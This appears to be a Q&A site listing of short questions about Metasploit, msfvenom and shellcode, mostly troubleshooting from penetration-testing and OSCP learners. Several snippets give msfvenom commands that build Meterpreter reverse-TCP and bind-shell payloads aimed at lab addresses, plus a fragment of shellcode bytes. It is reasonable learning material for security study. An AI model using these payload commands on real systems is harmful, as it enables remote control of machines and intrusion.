All Questions
Tagged with metasploitshellcode
25 questions
0votes
1answer
2kviews
Executing shellcode in python format [closed]
So after running the command: msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.31 lport=8080 -f py I receive the output: buf = b"" buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\...
0votes
0answers
2kviews
permission denied when executing an elf payload
I can examine a payload using libemu (sctest) and ndisasm, like this : msfvenom -p linux/x86/shell_bind_tcp -f raw | ./sctest -vvv -Ss 1000 msfvenom -p linux/x86/shell_bind_tcp -f raw | ndisasm -u -...
1vote
0answers
132views
Why is generated different traffic for the same attack?
I created a scenario in VirtualBox (configured as internal network) with two machines: Windows XP and Kali Linux. I used ms08_067_netapi exploit from Metasploit and the payload windows/meterpreter/...
1vote
1answer
5kviews
Windows 64-bit Reverse TCP Shell not working
I am sending shellcode to a 64-bit binary running on a Windows machine. This binary, copies the shellcode to an executable region of memory and executes it. I am generating the shellcode using ...
3votes
1answer
946views
Where I am going wrong with Veil? Cannot get a reverse shell? [duplicate]
This is how I am generating the payload in Veil 3 > use XX > set LHOST X.X.X.X > set LPORT 3333 > generate The payload generates successfully and transferred to victim machine Win7 SP1 VM ...
0votes
3answers
3kviews
MSFvenom payload with dynamic options
I am using MSFvenom to export meterpreter's reverse TCP payload. While this works with msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.6.131 LPORT=4444 -f -exe > ~/Desktop/...
3votes
1answer
2kviews
msfvenom incompatible character encodings error
I try to create payload for adding user to local administrators group, but the server language is Russian so I should add my local user to Администраторы group. When I try to create payload using ...
1vote
1answer
6kviews
Manually migrate to another process without using metasploit? [duplicate]
There is a useful meterpreter script that allows to migrate meterpreter to another process by specifying its PID. Imagine I have my own session running. How could I migrate to another process without ...
1vote
1answer
8kviews
MSFvenom format specifier
In msfvenom, what does it mean exactly when I specify the format to C or Python? And what is the format 'raw' for? I know, when the format is psh-cmd it runs in the command prompt, and when it is exe ...
5votes
1answer
9kviews
Error Running command shell :TimeoutError Operation Time out
I am Testing a Payload linux/x86/meterpreter/reverse_tcp in my Test Linux network to Exploit, I got a Meterpreter Session by Metasploit using it, I tried several commands like getuid, cat and all ...
4votes
3answers
5kviews
Install a vulnerable service for Windows 7
I have some kind of a project or demonstration, where I have to exploit Windows 7 to get a remote shell. I did a vulnerability scan with nessus on my Windows 7 machine, but I didn't find any kind of ...
-1votes
1answer
565views
During a penetration test, when is it preferable to use reverse HTTP payload and when reverse TCP payload? [closed]
I'm using Veil Evasion and Metasploit.
2votes
1answer
481views
Is my understanding of buffer overflows correct?
I am new to pentesting and wondering if my current understanding of buffer overflow exploits is correct. Assuming an operating address space of 3 addresses, an instruction space of 2 addresses, and an ...
3votes
2answers
155views
Is there any downside to always declaring some default bad chars when generating exploits?
When setting the bad chars for shell code, is there any downside to just assuming that you should mark \x00 and \x0a as bad?
1vote
0answers
1kviews
Sysinternals tool suite not working on low priv shell
Currently oscp student. I asked this on the oscp forum yesterday, but no responses so far. I am new to infosec, but have 18 years of education / work experience in IT. As far as I can tell, ...